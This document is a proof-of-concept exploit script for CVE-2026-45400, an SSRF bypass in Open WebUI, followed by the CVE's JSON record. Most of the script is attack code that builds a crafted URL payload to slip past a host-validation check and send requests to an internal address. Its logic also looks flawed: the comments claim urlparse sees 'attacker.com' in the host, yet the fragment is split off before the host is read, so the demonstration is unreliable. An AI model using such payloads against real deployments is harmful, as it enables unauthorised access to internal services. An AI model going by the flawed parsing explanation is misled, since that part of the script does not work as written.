CVE-2026-45400

#!/usr/bin/env python3 """ PoC for CVE-2026-45400 (Open WebUI SSRF Bypass) This script demonstrates the parsing difference between urlparse and requests. """ import requests from urllib.parse import urlparse # The malicious payload targeting the internal service # Example: Using the fragment '#' to confuse the parser # The validator sees 'attacker.com', but requests might go to 127.0.0.1 malicious_url = "http://127.0.0.1:80#@attacker.com" print(f"[+] Testing URL: {malicious_url}") # Simulation 1: How the vulnerable application validates (using urlparse) parsed = urlparse(malicious_url) print(f"[+] urlparse sees netloc (host): {parsed.netloc}") print(f"[+] App validation check: Is 'attacker.com' in {parsed.netloc}? -> {('attacker.com' in parsed.netloc)}") if 'attacker.com' in parsed.netloc: print("[!] Validation PASSED (App thinks it's safe)") # Simulation 2: How the application sends the request (using requests) # Note: requests library usually strips the fragment before sending the request print("\n[+] Sending request using requests library...") try: response = requests.get(malicious_url, timeout=5) print(f"[+] Request sent to: {response.url}") print(f"[+] Response Status Code: {response.status_code}") if response.status_code == 200: print("[!] SSRF Successful! Internal service accessed.") else: print("[-] Service returned non-200 status.") except requests.exceptions.ConnectionError: print("[-] Connection failed (Target might be offline or not vulnerable)") except Exception as e: print(f"[-] Error: {e}")

{"cve": {"id": "CVE-2026-45400", "sourceIdentifier": "[email protected]", "published": "2026-05-15T21:16:38.003", "lastModified": "2026-05-15T22:16:55.820", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, a parsing difference between the urlparse and requests libraries led to an SSRF bypass vulnerability. This vulnerability is fixed in 0.9.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-8w7q-q5jp-jvgx", "source": "[email protected]"}, {"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-8w7q-q5jp-jvgx", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}